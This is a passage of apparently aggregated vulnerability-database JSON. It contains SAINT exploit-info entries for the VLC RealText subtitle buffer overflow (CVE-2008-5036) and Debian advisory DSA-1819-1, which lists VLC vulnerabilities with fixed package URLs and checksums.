"2016-10-03T15:01:57", "bulletinFamily": "exploit", "description": "Added: 12/01/2008 \nCVE: [CVE-2008-5036](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5036>) \nBID: [32125](<http://www.securityfocus.com/bid/32125>) \nOSVDB: [49809](<http://www.osvdb.org/49809>) \n\n\n### Background\n\n[VLC media player](<http://www.videolan.org/vlc/>) is a media player supporting various audio and video formats for multiple platforms. \n\n### Problem\n\nA buffer overflow vulnerability in the ParseRealText function allows command execution when a user opens a media file which references a specially crafted RealText subtitle file. \n\n### Resolution\n\n[Upgrade](<http://www.videolan.org/vlc/>) to VLC media player 0.9.6 or higher. \n\n### References\n\n<http://www.videolan.org/security/sa0810.html> \n\n\n### Limitations\n\nExploit works with VLC media player 0.9.4 and requires a user to download and save the MOV and RT files in the same directory, and then open the MOV file in VLC. \n\n### Platforms\n\nWindows 2000 \nWindows XP \n \n\n", "modified": "2008-12-01T00:00:00", "published": "2008-12-01T00:00:00", "id": "SAINT:30D79470700D00FEC91D655D02BA2649", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/vlc_subtitle_parserealtext", "type": "saint", "title": "VLC media player RealText subtitle file ParseRealText buffer overflow", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-14T16:58:04", "bulletinFamily": "exploit", "description": "Added: 12/01/2008 \nCVE: [CVE-2008-5036](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5036>) \nBID: [32125](<http://www.securityfocus.com/bid/32125>) \nOSVDB: [49809](<http://www.osvdb.org/49809>) \n\n\n### Background\n\n[VLC media player](<http://www.videolan.org/vlc/>) is a media player supporting various audio and video formats for multiple platforms. \n\n### Problem\n\nA buffer overflow vulnerability in the ParseRealText function allows command execution when a user opens a media file which references a specially crafted RealText subtitle file. \n\n### Resolution\n\n[Upgrade](<http://www.videolan.org/vlc/>) to VLC media player 0.9.6 or higher. \n\n### References\n\n<http://www.videolan.org/security/sa0810.html> \n\n\n### Limitations\n\nExploit works with VLC media player 0.9.4 and requires a user to download and save the MOV and RT files in the same directory, and then open the MOV file in VLC. \n\n### Platforms\n\nWindows 2000 \nWindows XP \n \n\n", "modified": "2008-12-01T00:00:00", "published": "2008-12-01T00:00:00", "id": "SAINT:8F81E8D290541B0FB9EBEC7F2E682919", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/vlc_subtitle_parserealtext", "type": "saint", "title": "VLC media player RealText subtitle file ParseRealText buffer overflow", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:14", "bulletinFamily": "exploit", "description": "Added: 12/01/2008 \nCVE: [CVE-2008-5036](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5036>) \nBID: [32125](<http://www.securityfocus.com/bid/32125>) \nOSVDB: [49809](<http://www.osvdb.org/49809>) \n\n\n### Background\n\n[VLC media player](<http://www.videolan.org/vlc/>) is a media player supporting various audio and video formats for multiple platforms. \n\n### Problem\n\nA buffer overflow vulnerability in the ParseRealText function allows command execution when a user opens a media file which references a specially crafted RealText subtitle file. \n\n### Resolution\n\n[Upgrade](<http://www.videolan.org/vlc/>) to VLC media player 0.9.6 or higher. \n\n### References\n\n<http://www.videolan.org/security/sa0810.html> \n\n\n### Limitations\n\nExploit works with VLC media player 0.9.4 and requires a user to download and save the MOV and RT files in the same directory, and then open the MOV file in VLC. \n\n### Platforms\n\nWindows 2000 \nWindows XP \n \n\n", "modified": "2008-12-01T00:00:00", "published": "2008-12-01T00:00:00", "id": "SAINT:633FF5B9674D30D0C99E56240FA81BE2", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/vlc_subtitle_parserealtext", "title": "VLC media player RealText subtitle file ParseRealText buffer overflow", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2018-10-16T22:13:21", "bulletinFamily": "unix", "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1819-1 security@debian.org\nhttp://www.debian.org/security/ Steffen Joeris\nJune 18, 2009 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : vlc \nVulnerability : several vulnerabilities\nProblem type : local (remote) \nDebian-specific: no \nCVE Ids : CVE-2008-1768 CVE-2008-1769 CVE-2008-1881 CVE-2008-2147 \n CVE-2008-2430 CVE-2008-3794 CVE-2008-4686 CVE-2008-5032 \nDebian Bugs : 478140 477805 489004 496265 503118 504639 480724 \n\n\nSeveral vulnerabilities have been discovered in vlc, a multimedia player\nand streamer. The Common Vulnerabilities and Exposures project \nidentifies the following problems: \n\nCVE-2008-1768\n\nDrew Yao discovered that multiple integer overflows in the MP4 demuxer,\nReal demuxer and Cinepak codec can lead to the execution of arbitrary \ncode. \n\nCVE-2008-1769\n\nDrew Yao discovered that the Cinepak codec is prone to a memory\ncorruption, which can be triggered by a crafted Cinepak file. \n\nCVE-2008-1881\n\nLuigi Auriemma discovered that it is possible to execute arbitrary code\nvia a long subtitle in an SSA file.\n\nCVE-2008-2147\n\nIt was discovered that vlc is prone to a search path vulnerability,\nwhich allows local users to perform privilege escalations.\n\nCVE-2008-2430\n\nAlin Rad Pop discovered that it is possible to execute arbitrary code\nwhen opening a WAV file containing a large fmt chunk.\n\nCVE-2008-3794\n\nP\u00c4\u00b1nar Yanarda\u00c4? discovered that it is possible to execute arbitrary code\nwhen opening a crafted mmst link.\n\nCVE-2008-4686\n\nTobias Klein discovered that it is possible to execute arbitrary code\nwhen opening a crafted .ty file.\n\nCVE-2008-5032\n\nTobias Klein discovered that it is possible to execute arbitrary code\nwhen opening an invalid CUE image file with a crafted header.\n\n\nFor the oldstable distribution (etch), these problems have been fixed\nin version 0.8.6-svn20061012.debian-5.1+etch3.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 0.8.6.h-4+lenny2, which was already included in the lenny\nrelease.\n\nFor the testing distribution (squeeze) and the unstable distribution\n(sid), these problems have been fixed in version 0.8.6.h-5.\n\n\nWe recommend that you upgrade your vlc packages.\n\n\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nDebian (oldstable)\n- ------------------\n\nOldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/v/vlc/vlc_0.8.6-svn20061012.debian.orig.tar.gz\n Size/MD5 checksum: 15168393 30c18a2fdc4105606033ff6e6aeab81c\n http://security.debian.org/pool/updates/main/v/vlc/vlc_0.8.6-svn20061012.debian-5.1+etch3.diff.gz\n Size/MD5 checksum: 2390010 aacfe6dc712b98ae872794d9d70fe1e3\n http://security.debian.org/pool/updates/main/v/vlc/vlc_0.8.6-svn20061012.debian-5.1+etch3.dsc\n Size/MD5 checksum: 2622 bc3a4f4ee0ecd699820b478e96beecad\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/v/vlc/wxvlc_0.8.6-svn20061012.debian-5.1+etch3_all.deb\n Size/MD5 checksum: 778 62c36d9c3fe088478b442efec17b5b7e\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-alsa_0.8.6-svn20061012.debian-5.1+etch3_all.deb\n Size/MD5 checksum: 786 12f8c6ef696cb7c6b8b1e33b313f72f0\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-esd_0.8.6-svn20061012.debian-5.1+etch3_alpha.deb\n Size/MD5 checksum: 5028 1c44834297096fe893775a5d95d1913b\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-arts_0.8.6-svn20061012.debian-5.1+etch3_alpha.deb\n Size/MD5 checksum: 4444 ad948e7f91e08a0261a009a62bd2a76b\n http://security.debian.org/pool/updates/main/v/vlc/libvlc0_0.8.6-svn20061012.debian-5.1+etch3_alpha.deb\n Size/MD5 checksum: 1157956 da37f9efbdef57c192781d775818e042\n http://security.debian.org/pool/updates/main/v/vlc/mozilla-plugin-vlc_0.8.6-svn20061012.debian-5.1+etch3_alpha.deb\n Size/MD5 checksum: 40298 3c6639b6241c035f35508ed2b41e94b7\n http://security.debian.org/pool/updates/main/v/vlc/vlc-nox_0.8.6-svn20061012.debian-5.1+etch3_alpha.deb\n Size/MD5 checksum: 5169476 7342181513646f6562051fe843dab946\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-sdl_0.8.6-svn20061012.debian-5.1+etch3_alpha.deb\n Size/MD5 checksum: 13048 63b8dfc325bf011cd9ab2762ac404da8\n http://security.debian.org/pool/updates/main/v/vlc/libvlc0-dev_0.8.6-svn20061012.debian-5.1+etch3_alpha.deb\n Size/MD5 checksum: 20162 9fd790aaa1a58aaa7de59ca17eec2ea9\n http://security.debian.org/pool/updates/main/v/vlc/vlc_0.8.6-svn20061012.debian-5.1+etch3_alpha.deb\n Size/MD5 checksum: 1306476 230f2731958e3d9740198c66b7a14531\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-ggi_0.8.6-svn20061012.debian-5.1+etch3_alpha.deb\n Size/MD5 checksum: 6942 96f9d8b30b4c66b9d81a47e3f6141b7a\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/v/vlc/libvlc0-dev_0.8.6-svn20061012.debian-5.1+etch3_amd64.deb\n Size/MD5 checksum: 20226 73bbae9c7491cb8fb99ae3c9e3b34670\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-sdl_0.8.6-svn20061012.debian-5.1+etch3_amd64.deb\n Size/MD5 checksum: 11336 623ceac24cb2a59cbbdb96723c7feb4d\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-ggi_0.8.6-svn20061012.debian-5.1+etch3_amd64.deb\n Size/MD5 checksum: 6054 99babdfe76e9ce755f36add0f01750bb\n http://security.debian.org/pool/updates/main/v/vlc/vlc-nox_0.8.6-svn20061012.debian-5.1+etch3_amd64.deb\n Size/MD5 checksum: 4667204 0304843fa1801c73ddd1b3e38cb66adf\n http://security.debian.org/pool/updates/main/v/vlc/libvlc0_0.8.6-svn20061012.debian-5.1+etch3_amd64.deb\n Size/MD5 checksum: 951212 9b43d2bc0cbc149000e904d4251e05a0\n http://security.debian.org/pool/updates/main/v/vlc/mozilla-plugin-vlc_0.8.6-svn20061012.debian-5.1+etch3_amd64.deb\n Size/MD5 checksum: 36766 db3ee54d447f07bf7baf12dd69ebba3f\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-esd_0.8.6-svn20061012.debian-5.1+etch3_amd64.deb\n Size/MD5 checksum: 4518 24bd15d1aa8f929e5e122130931a3bdd\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-arts_0.8.6-svn20061012.debian-5.1+etch3_amd64.deb\n Size/MD5 checksum: 4188 9c82be723419ef7c45c28fa850d8a006\n http://security.debian.org/pool/updates/main/v/vlc/vlc_0.8.6-svn20061012.debian-5.1+etch3_amd64.deb\n Size/MD5 checksum: 1144154 67bc1eb6d916e8fa6dd6f55e283f7c08\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-arts_0.8.6-svn20061012.debian-5.1+etch3_arm.deb\n Size/MD5 checksum: 4206 41e5a43abe8480afefb61b0a539b7170\n http://security.debian.org/pool/updates/main/v/vlc/libvlc0-dev_0.8.6-svn20061012.debian-5.1+etch3_arm.deb\n Size/MD5 checksum: 20124 41ef717a928b54131f6576645fb11aae\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-ggi_0.8.6-svn20061012.debian-5.1+etch3_arm.deb\n Size/MD5 checksum: 6096 431cb2ba76f85a4fc8a2e12d3f0fbb7a\n http://security.debian.org/pool/updates/main/v/vlc/libvlc0_0.8.6-svn20061012.debian-5.1+etch3_arm.deb\n Size/MD5 checksum: 998448 9f638f133362b620b1a25be555774f62\n http://security.debian.org/pool/updates/main/v/vlc/vlc_0.8.6-svn20061012.debian-5.1+etch3_arm.deb\n Size/MD5 checksum: 1262714 9aca627018c73b385c1585f67e611c85\n http://security.debian.org/pool/updates/main/v/vlc/mozilla-plugin-vlc_0.8.6-svn20061012.debian-5.1+etch3_arm.deb\n Size/MD5 checksum: 33318 b34aa4d414f141614bf8e24a2fa7d1f5\n http://security.debian.org/pool/updates/main/v/vlc/vlc-nox_0.8.6-svn20061012.debian-5.1+etch3_arm.deb\n Size/MD5 checksum: 4720770 6084cfde985ecc782d131d87376d5631\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-sdl_0.8.6-svn20061012.debian-5.1+etch3_arm.deb\n Size/MD5 checksum: 10810 05901b3cb763c6df7512e95b21ae3057\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-esd_0.8.6-svn20061012.debian-5.1+etch3_arm.deb\n Size/MD5 checksum: 5582 089ffa3b5ab140334680b9d420f28fe2\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-esd_0.8.6-svn20061012.debian-5.1+etch3_hppa.deb\n Size/MD5 checksum: 6970 9f4a68eee0c5c64b3020417d4c94a2ea\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-ggi_0.8.6-svn20061012.debian-5.1+etch3_hppa.deb\n Size/MD5 checksum: 7802 15eb78a9af99e4621e8e16c1db792a83\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-arts_0.8.6-svn20061012.debian-5.1+etch3_hppa.deb\n Size/MD5 checksum: 5360 fd9392b53054be7cf8a875ead65b74ae\n http://security.debian.org/pool/updates/main/v/vlc/mozilla-plugin-vlc_0.8.6-svn20061012.debian-5.1+etch3_hppa.deb\n Size/MD5 checksum: 46662 231785bcf877904edc5689be92765764\n http://security.debian.org/pool/updates/main/v/vlc/vlc-nox_0.8.6-svn20061012.debian-5.1+etch3_hppa.deb\n Size/MD5 checksum: 5241886 ecf4256f3266b72398d3102d778e0c0b\n http://security.debian.org/pool/updates/main/v/vlc/libvlc0-dev_0.8.6-svn20061012.debian-5.1+etch3_hppa.deb\n Size/MD5 checksum: 20090 7245b16edcd128fa86d6dbc25e9acdf3\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-sdl_0.8.6-svn20061012.debian-5.1+etch3_hppa.deb\n Size/MD5 checksum: 13752 5c113155b10404e94aa695346eec0437\n http://security.debian.org/pool/updates/main/v/vlc/libvlc0_0.8.6-svn20061012.debian-5.1+etch3_hppa.deb\n Size/MD5 checksum: 1083956 3b4c77690fbe73efe95ad664487edf3d\n http://security.debian.org/pool/updates/main/v/vlc/vlc_0.8.6-svn20061012.debian-5.1+etch3_hppa.deb\n Size/MD5 checksum: 1374550 c09d8dc3870426212a7be03c49f77be3\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/v/vlc/vlc_0.8.6-svn20061012.debian-5.1+etch3_i386.deb\n Size/MD5 checksum: 1137756 c55814ba9192c4c2c81a983bfb3b0b4d\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-sdl_0.8.6-svn20061012.debian-5.1+etch3_i386.deb\n Size/MD5 checksum: 10714 fb4d96ed4c70d57410aa1b9a3686d04c\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-glide_0.8.6-svn20061012.debian-5.1+etch3_i386.deb\n Size/MD5 checksum: 4138 f137b88a817cc34f4ce3bece8f95d0b5\n http://security.debian.org/pool/updates/main/v/vlc/vlc-nox_0.8.6-svn20061012.debian-5.1+etch3_i386.deb\n Size/MD5 checksum: 4652906 3321d798ec1146fea206b6e4120a0801\n http://security.debian.org/pool/updates/main/v/vlc/libvlc0-dev_0.8.6-svn20061012.debian-5.1+etch3_i386.deb\n Size/MD5 checksum: 20104 5742bd41d213b498063e8070723361cf\n http://security.debian.org/pool/updates/main/v/vlc/libvlc0_0.8.6-svn20061012.debian-5.1+etch3_i386.deb\n Size/MD5 checksum: 959380 1c496575c6b3966348595a2ee9b5b822\n http://security.debian.org/pool/updates/main/v/vlc/mozilla-plugin-vlc_0.8.6-svn20061012.debian-5.1+etch3_i386.deb\n Size/MD5 checksum: 36190 82b82e147a2460780cfda4d67e27acc4\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-esd_0.8.6-svn20061012.debian-5.1+etch3_i386.deb\n Size/MD5 checksum: 4820 2bf05cc5740357c059ca66feabf406b2\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-ggi_0.8.6-svn20061012.debian-5.1+etch3_i386.deb\n Size/MD5 checksum: 5842 48a4e79963b7da791c165c484fc11d76\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-arts_0.8.6-svn20061012.debian-5.1+etch3_i386.deb\n Size/MD5 checksum: 4106 71906ef569dc94bbddbec713289ef3a8\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-svgalib_0.8.6-svn20061012.debian-5.1+etch3_i386.deb\n Size/MD5 checksum: 4536 b02d59bd875bbd9b36c4dc54a16f1992\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-ggi_0.8.6-svn20061012.debian-5.1+etch3_ia64.deb\n Size/MD5 checksum: 9096 fa4b850dadb0a697004617e968851d3a\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-arts_0.8.6-svn20061012.debian-5.1+etch3_ia64.deb\n Size/MD5 checksum: 5444 85afaf61e92a664c7b903031d169eb5a\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-sdl_0.8.6-svn20061012.debian-5.1+etch3_ia64.deb\n Size/MD5 checksum: 17178 00ac774370b4016649ad172bc84667f2\n http://security.debian.org/pool/updates/main/v/vlc/mozilla-plugin-vlc_0.8.6-svn20061012.debian-5.1+etch3_ia64.deb\n Size/MD5 checksum: 49096 e07daab8ac4e5ea3427fdbadfa671aba\n http://security.debian.org/pool/updates/main/v/vlc/vlc-nox_0.8.6-svn20061012.debian-5.1+etch3_ia64.deb\n Size/MD5 checksum: 5905658 164b7902e5e5d5f511305632b6f6a812\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-esd_0.8.6-svn20061012.debian-5.1+etch3_ia64.deb\n Size/MD5 checksum: 6206 d0ae6c6462bdc873a845048ecb4fae4b\n http://security.debian.org/pool/updates/main/v/vlc/libvlc0_0.8.6-svn20061012.debian-5.1+etch3_ia64.deb\n Size/MD5 checksum: 1459396 ea5d66259ff182a5c343dbf490274bbe\n http://security.debian.org/pool/updates/main/v/vlc/libvlc0-dev_0.8.6-svn20061012.debian-5.1+etch3_ia64.deb\n Size/MD5 checksum: 20130 3b611aaac099317e626c4b81d5ee9bc4\n http://security.debian.org/pool/updates/main/v/vlc/vlc_0.8.6-svn20061012.debian-5.1+etch3_ia64.deb\n Size/MD5 checksum: 1568890 d44cfd0dc33d34aaa3b106a79f806382\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-sdl_0.8.6-svn20061012.debian-5.1+etch3_mips.deb\n Size/MD5 checksum: 12262 48790d9a97eab369ec9aa3529684f206\n http://security.debian.org/pool/updates/main/v/vlc/mozilla-plugin-vlc_0.8.6-svn20061012.debian-5.1+etch3_mips.deb\n Size/MD5 checksum: 35552 a47c2e52b8f829383addd5f7fb286c5c\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-ggi_0.8.6-svn20061012.debian-5.1+etch3_mips.deb\n Size/MD5 checksum: 6846 2b36dbc841cd22299aa175a4f1e65ca8\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-arts_0.8.6-svn20061012.debian-5.1+etch3_mips.deb\n Size/MD5 checksum: 4492 4fc39c1471bca127f178856da0c8518e\n http://security.debian.org/pool/updates/main/v/vlc/vlc_0.8.6-svn20061012.debian-5.1+etch3_mips.deb\n Size/MD5 checksum: 1113268 cfc2795f1ccaf23a35e9102345bf0c65\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-esd_0.8.6-svn20061012.debian-5.1+etch3_mips.deb\n Size/MD5 checksum: 5962 df95686291e5fc52d130b4b4e425fe45\n http://security.debian.org/pool/updates/main/v/vlc/libvlc0-dev_0.8.6-svn20061012.debian-5.1+etch3_mips.deb\n Size/MD5 checksum: 20126 4d8ef48d4fd233f1fe1bf3335022fb43\n http://security.debian.org/pool/updates/main/v/vlc/libvlc0_0.8.6-svn20061012.debian-5.1+etch3_mips.deb\n Size/MD5 checksum: 1005096 ab3c1942a9fa822091cee3c76660594c\n http://security.debian.org/pool/updates/main/v/vlc/vlc-nox_0.8.6-svn20061012.debian-5.1+etch3_mips.deb\n Size/MD5 checksum: 4974220 6d7b51e1122a376ff6f0a04a660e9ed6\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-esd_0.8.6-svn20061012.debian-5.1+etch3_mipsel.deb\n Size/MD5 checksum: 5916 dc0c51da2d60b705ae3938824c0a941e\n http://security.debian.org/pool/updates/main/v/vlc/libvlc0_0.8.6-svn20061012.debian-5.1+etch3_mipsel.deb\n Size/MD5 checksum: 922780 d81949c76c6fdf1ea138961cbe0f36be\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-ggi_0.8.6-svn20061012.debian-5.1+etch3_mipsel.deb\n Size/MD5 checksum: 6718 5530126155e75c9ed883ac2861c79b96\n http://security.debian.org/pool/updates/main/v/vlc/vlc_0.8.6-svn20061012.debian-5.1+etch3_mipsel.deb\n Size/MD5 checksum: 1005626 7fd2f06e879625a7121164353d65df6f\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-sdl_0.8.6-svn20061012.debian-5.1+etch3_mipsel.deb\n Size/MD5 checksum: 11946 80eeb122e2bbf4c9b2e430f3513115cc\n http://security.debian.org/pool/updates/main/v/vlc/mozilla-plugin-vlc_0.8.6-svn20061012.debian-5.1+etch3_mipsel.deb\n Size/MD5 checksum: 34624 305feab6d4ead93fd6d76239d05732b0\n http://security.debian.org/pool/updates/main/v/vlc/vlc-nox_0.8.6-svn20061012.debian-5.1+etch3_mipsel.deb\n Size/MD5 checksum: 4668688 27f431fe153b7efee925ef04c1a9befe\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-arts_0.8.6-svn20061012.debian-5.1+etch3_mipsel.deb\n Size/MD5 checksum: 4480 a4684079cd594e316d62cf28e8c76adf\n http://security.debian.org/pool/updates/main/v/vlc/libvlc0-dev_0.8.6-svn20061012.debian-5.1+etch3_mipsel.deb\n Size/MD5 checksum: 20136 77fbce0f999345f0afdf0650a7794647\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/v/vlc/vlc_0.8.6-svn20061012.debian-5.1+etch3_powerpc.deb\n Size/MD5 checksum: 1191316 b6ef4d881376ef204278456a57166236\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-arts_0.8.6-svn20061012.debian-5.1+etch3_powerpc.deb\n Size/MD5 checksum: 5626 cdd05580d5e1c7653d13a07167274c45\n http://security.debian.org/pool/updates/main/v/vlc/libvlc0_0.8.6-svn20061012.debian-5.1+etch3_powerpc.deb\n Size/MD5 checksum: 1022198 8cdf75ed5cd61cf5e2ae7b297b7819e5\n http://security.debian.org/pool/updates/main/v/vlc/mozilla-plugin-vlc_0.8.6-svn20061012.debian-5.1+etch3_powerpc.deb\n Size/MD5 checksum: 38260 b9681d0824ead229fa9c2a42c2516017\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-esd_0.8.6-svn20061012.debian-5.1+etch3_powerpc.deb\n Size/MD5 checksum: 6910 d0bca6f30f15af804d044d666042d1ce\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-ggi_0.8.6-svn20061012.debian-5.1+etch3_powerpc.deb\n Size/MD5 checksum: 7988 cfed8cf8c2c864be55373ce15e23d3f0\n http://security.debian.org/pool/updates/main/v/vlc/vlc-nox_0.8.6-svn20061012.debian-5.1+etch3_powerpc.deb\n Size/MD5 checksum: 5116308 105e08206811fe472412382a85c811e1\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-sdl_0.8.6-svn20061012.debian-5.1+etch3_powerpc.deb\n Size/MD5 checksum: 13714 ae7ec3ac6f7d1fdfab774d54958965aa\n http://security.debian.org/pool/updates/main/v/vlc/libvlc0-dev_0.8.6-svn20061012.debian-5.1+etch3_powerpc.deb\n Size/MD5 checksum: 20270 d4c85cb0405292434d7537bd9e4b4494\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-arts_0.8.6-svn20061012.debian-5.1+etch3_s390.deb\n Size/MD5 checksum: 4300 eda9d5b506dd1a70ef73bb592b58c3ef\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-esd_0.8.6-svn20061012.debian-5.1+etch3_s390.deb\n Size/MD5 checksum: 6052 25aff1e5103edb5a9f734710d6b589b9\n http://security.debian.org/pool/updates/main/v/vlc/mozilla-plugin-vlc_0.8.6-svn20061012.debian-5.1+etch3_s390.deb\n Size/MD5 checksum: 38336 08f2d6171ebb761babf664eb37ebe784\n http://security.debian.org/pool/updates/main/v/vlc/libvlc0_0.8.6-svn20061012.debian-5.1+etch3_s390.deb\n Size/MD5 checksum: 1019556 478a55d6631a2fba2267a8cd3dbd19f2\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-sdl_0.8.6-svn20061012.debian-5.1+etch3_s390.deb\n Size/MD5 checksum: 11412 a1e43e44ed1c20efd323adb4d48b90a6\n http://security.debian.org/pool/updates/main/v/vlc/vlc-nox_0.8.6-svn20061012.debian-5.1+etch3_s390.deb\n Size/MD5 checksum: 4860616 92fef2c23dccb82e00bbc7c016d4dd21\n http://security.debian.org/pool/updates/main/v/vlc/libvlc0-dev_0.8.6-svn20061012.debian-5.1+etch3_s390.deb\n Size/MD5 checksum: 20138 566c8573bef9cb08134ba1fe000b40a4\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-ggi_0.8.6-svn20061012.debian-5.1+etch3_s390.deb\n Size/MD5 checksum: 6322 67e8fd4b37cb84c6e59f5de27f21eb13\n http://security.debian.org/pool/updates/main/v/vlc/vlc_0.8.6-svn20061012.debian-5.1+etch3_s390.deb\n Size/MD5 checksum: 1172942 c30ffacd5c961e3b3f295b9e7ab175f2\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/v/vlc/mozilla-plugin-vlc_0.8.6-svn20061012.debian-5.1+etch3_sparc.deb\n Size/MD5 checksum: 33310 bc7e610c4085598763e056f255429873\n http://security.debian.org/pool/updates/main/v/vlc/vlc-nox_0.8.6-svn20061012.debian-5.1+etch3_sparc.deb\n Size/MD5 checksum: 4683530 04cd5bf600eca4c872cb802d767deb0a\n http://security.debian.org/pool/updates/main/v/vlc/libvlc0-dev_0.8.6-svn20061012.debian-5.1+etch3_sparc.deb\n Size/MD5 checksum: 19924 4988a8da8b1e97514c747a6964f7f856\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-ggi_0.8.6-svn20061012.debian-5.1+etch3_sparc.deb\n Size/MD5 checksum: 5752 7584f5b967b245d7a0db7eb47fef5547\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-esd_0.8.6-svn20061012.debian-5.1+etch3_sparc.deb\n Size/MD5 checksum: 4756 4526e8e7fceb344711f60ccaf3acfaa1\n http://security.debian.org/pool/updates/main/v/vlc/vlc_0.8.6-svn20061012.debian-5.1+etch3_sparc.deb\n Size/MD5 checksum: 1193282 76e99484e3d54569b80770a493ad2e49\n http://security.debian.org/pool/updates/main/v/vlc/libvlc0_0.8.6-svn20061012.debian-5.1+etch3_sparc.deb\n Size/MD5 checksum: 951186 2a21b9e1e6edd1d7a32a51abf3f782f3\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-arts_0.8.6-svn20061012.debian-5.1+etch3_sparc.deb\n Size/MD5 checksum: 3920 ea9aff23630aa00dfcd37cb98df22408\n http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-sdl_0.8.6-svn20061012.debian-5.1+etch3_sparc.deb\n Size/MD5 checksum: 10404 d9ea8f6e0096234c4d9bdf9595eb5dbe\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "modified": "2009-06-18T13:14:01", "published": "2009-06-18T13:14:01", "id": "DEBIAN:DSA-1819-1:D0BD5", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2009/msg00131.html", "title": "[SECURITY] [DSA 1819-1] New vlc packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}